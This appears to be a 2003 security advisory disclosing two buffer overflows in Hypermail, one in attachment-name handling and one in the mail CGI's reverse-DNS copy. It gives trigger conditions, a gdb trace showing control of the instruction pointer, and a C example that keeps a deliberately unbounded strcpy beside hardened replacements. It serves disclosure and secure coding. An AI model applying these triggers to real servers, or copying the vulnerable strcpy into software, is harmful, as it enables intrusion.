From: Ulf Harnhammar (ulfh_at_update.uu.se)
Date: Sun Jan 26 2003 - 20:02:39 CST


    Hypermail buffer overflows

    PROGRAM: Hypermail
    HOMEPAGE: http://www.hypermail.org/
    SOURCEFORGE PAGE: http://sourceforge.net/projects/hypermail/
    VULNERABLE VERSIONS: 2.1.3, 2.1.4, 2.1.5, possibly others
    IMMUNE VERSIONS: 2.1.6

    DESCRIPTION:

    "Hypermail 2 is a much enhanced version of the popular tool that
    converts mails into nicely formatted HTML pages. Version 2 has a
    lot of new features including MIME support. Perfect for archiving
    mailing lists and similar."

    (direct quote from the program's project page at Freshmeat)

    SUMMARY:

    I have found one exploitable buffer overflow in Hypermail's main
    program, hypermail, and one in Hypermail's CGI program, mail. The
    overflow in hypermail can be triggered by sending e-mail to a list
    that the program archives, but only when hypermail is configured
    with one particular option (progress=2, see below). The overflow in
    mail can be triggered by controlling the reverse DNS (PTR) record
    for your own IP address and then browsing to the CGI program.

    TECHNICAL DETAILS:

    a) hypermail

    The main program, hypermail, mishandles the combination of a long
    attachment filename (252 characters) and the option progress set to
    2. This option prints verbose information about which directories and
    files are created, which is useful for new Hypermail administrators
    or people debugging problems. I've attached a copy of a mailbox
    that triggers this buffer overflow.

    How does it work? First the attachname variable in the parsemail
    function in parse.c is overrun. Then, when the function print_progress
    is called, its bufstr variable is also overrun. As the session
    capture below shows, the processor jumps to an address of the
    attacker's choice: the saved return address and the callee-saved
    registers restored from the stack all come back as 0x55555555, the
    byte value of the 'U' padding in the filename. This is exploitable.

    $ cat /etc/redhat-release
    Red Hat Linux release 7.3 (Valhalla)
    $ uname -a
    Linux h130n1flsxxoxxx.telia.com 2.4.18-19.7.x #1 Thu Dec 12 09:00:42
    EST 2002 i686 unknown
    $ pwd
    /home/vsu/secwork/hypermail-2.1.5/src
    $ ./hypermail -o progress=2 -m /var/spool/mail/vsu
     Creating directory "vsu", mode 755.
    Loading mailbox "/var/spool/mail/vsu"...
     Creating directory "vsu//att-0000", mode 755.
       0 Created attachment file vsu//att-0000/01-UUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUU
    Segmentation fault
    $ rm -rf vsu
    $ gdb hypermail
    GNU gdb Red Hat Linux (5.2-2)
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and
    you are welcome to change it and/or distribute copies of it under
    certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for
    details.
    This GDB was configured as "i386-redhat-linux"...
    (gdb) r -o progress=2 -m /var/spool/mail/vsu
    Starting program: /home/vsu/secwork/hypermail-2.1.5/src/hypermail -o
    progress=2 -m /var/spool/mail/vsu
     Creating directory "vsu", mode 755.
    Loading mailbox "/var/spool/mail/vsu"...
     Creating directory "vsu//att-0000", mode 755.
       0 Created attachment file vsu//att-0000/01-UUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUU

    Program received signal SIGSEGV, Segmentation fault.
    0x55555555 in ?? ()
    (gdb) whe
    #0 0x55555555 in ?? ()
    Cannot access memory at address 0x55555555
    (gdb) i r
    eax 0x0 0
    ecx 0x0 0
    edx 0x0 0
    ebx 0x55555555 1431655765
    esp 0xbfffe870 0xbfffe870
    ebp 0x55555555 0x55555555
    esi 0x55555555 1431655765
    edi 0x55555555 1431655765
    eip 0x55555555 0x55555555
    eflags 0x10246 66118
    cs 0x23 35
    ss 0x2b 43
    ds 0x2b 43
    es 0x2b 43
    fs 0x0 0
    gs 0x0 0
    fctrl 0x37f 895
    fstat 0x0 0
    ftag 0xffff 65535
    fiseg 0x0 0
    fioff 0x0 0
    foseg 0x0 0
    fooff 0x0 0
    fop 0x0 0
    xmm0 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm1 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm2 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm3 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm4 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm5 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm6 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm7 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    mxcsr 0x1f80 8064
    orig_eax 0xffffffff -1
    (gdb) q
    The program is running. Exit anyway? (y or n) y
    $

    There are also other buffer overruns in the parsemail function,
    including in the boundbuffer and filename variables, but they
    don't appear to be exploitable.

    b) mail

    The CGI program mail does a reverse look-up of the client's IP
    address and uses strcpy to copy the resulting host name into a
    fixed-size buffer of 80 chars. If you control the reverse DNS for
    your IP address and make it resolve to a host name of 122 chars,
    this is also exploitable.

    Since this CGI program lets anyone send mail from any address to
    any address, it can also be abused by spammers.
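
    Both bugs above share one pattern: an attacker-controlled string
    (the attachment filename that overruns attachname and then bufstr in
    print_progress in case (a), the reverse-DNS name copied with strcpy
    into an 80-char buffer in case (b)) is written into a fixed-size
    buffer with no length check. The following is an added example
    written for this page, not Hypermail's source code. It shows the
    unbounded strcpy pattern beside a bounded, validated replacement for
    the hostname case, and a bounded formatting routine for the
    "Created attachment file" progress line. The 80-char hostname buffer
    is the size the advisory gives; the 128-byte progress buffer, all
    function names, and the sample names built by the helpers are
    assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Hypermail code. HOSTBUF is the 80-char size named in
 * the advisory; PROGRESSBUF and the sample names are assumptions. */
#define HOSTBUF     80
#define PROGRESSBUF 128

/* The vulnerable pattern from the advisory: an unbounded strcpy of a
 * reverse-DNS result into a fixed buffer. A PTR record is under the
 * attacker's control, so a 122-char name overruns dst by 43 bytes.
 * Kept only to show the bug; it is never called with untrusted input. */
void copy_hostname_vulnerable(char dst[HOSTBUF], const char *hostname)
{
    strcpy(dst, hostname);
}

/* Hardened replacement: refuse names that do not fit (NUL included) and
 * names with anything outside letters, digits, '-' and '.', since PTR
 * data may carry arbitrary bytes. Returns 1 if dst was filled, else 0. */
int copy_hostname_checked(char *dst, size_t dstlen, const char *hostname)
{
    size_t n = strlen(hostname);
    if (n == 0 || n >= dstlen)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)hostname[i];
        if (!isalnum(c) && c != '-' && c != '.')
            return 0;
    }
    memcpy(dst, hostname, n + 1);
    return 1;
}

/* Hardened progress line for the attachment case: even when the name
 * itself is bounded, the combined "dir/name" message must be bounded
 * too. snprintf never writes past outlen, and its return value tells us
 * whether the message was cut. Returns 1 if everything fit, else 0. */
int format_progress(char *out, size_t outlen, const char *dir, const char *name)
{
    int n = snprintf(out, outlen, "Created attachment file %s/%s", dir, name);
    return n >= 0 && (size_t)n < outlen;
}

/* Check one literal hostname against an 80-char destination. */
int hostname_accepted(const char *hostname)
{
    char dst[HOSTBUF];
    return copy_hostname_checked(dst, sizeof dst, hostname);
}

/* Build a constructed hostname of `len` 'a's (the advisory's 122-char
 * case) and report whether the hardened copy accepts it. */
int hostname_fits(size_t len)
{
    char host[256];
    if (len > sizeof host - 1)
        return -1;
    memset(host, 'a', len);
    host[len] = '\0';
    return hostname_accepted(host);
}

/* Build a constructed attachment name of `namelen` 'U's (the 252-char
 * case) and report whether the progress line fits in PROGRESSBUF. */
int progress_fits(size_t namelen)
{
    char name[256], msg[PROGRESSBUF];
    if (namelen > sizeof name - 1)
        return -1;
    memset(name, 'U', namelen);
    name[namelen] = '\0';
    return format_progress(msg, sizeof msg, "vsu//att-0000", name);
}

int main(void)
{
    printf("122-char hostname accepted: %d\n", hostname_fits(122));
    printf("16-char hostname accepted:  %d\n", hostname_fits(16));
    printf("hostname with a space:      %d\n", hostname_accepted("a b.example"));
    printf("252-char attachment fits:   %d\n", progress_fits(252));
    printf("40-char attachment fits:    %d\n", progress_fits(40));
    return 0;
}
```

    Compile with gcc -Wall and run it: the hardened routines reject the
    122-char hostname outright and report truncation for the 252-char
    attachment name instead of writing past the buffer. The charset
    check matters beyond the overflow: a hostname taken from reverse DNS
    ends up in log lines and web pages, so it should be treated as
    untrusted input, not as an identifier the server resolved for you.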

    WORKAROUND:

    Set the progress option to a value other than 2. Configure Hypermail
    not to use the CGI program mail, and then remove the mail binary
    from your cgi-bin directory.

    SOLUTION:

    Upgrade to version 2.1.6, which fixes all the problems mentioned
    above.

    COMMUNICATION WITH VENDOR:

    The vendor was contacted on the 23rd of January. Version 2.1.6 was
    released on the 24th of January.

    // Ulf Harnhammar, VSU Security, ulfhupdate.uu.se
       lynx -source http://slashdot.org/ | head -n1 | tr YDC oHl | \
       sed -e 'y%PETO% wle%' -e 's% .*$%%' -e 's%L%d.%' -e 's%M%%' \
       -e 's% H%or%' -e 's%^..%%'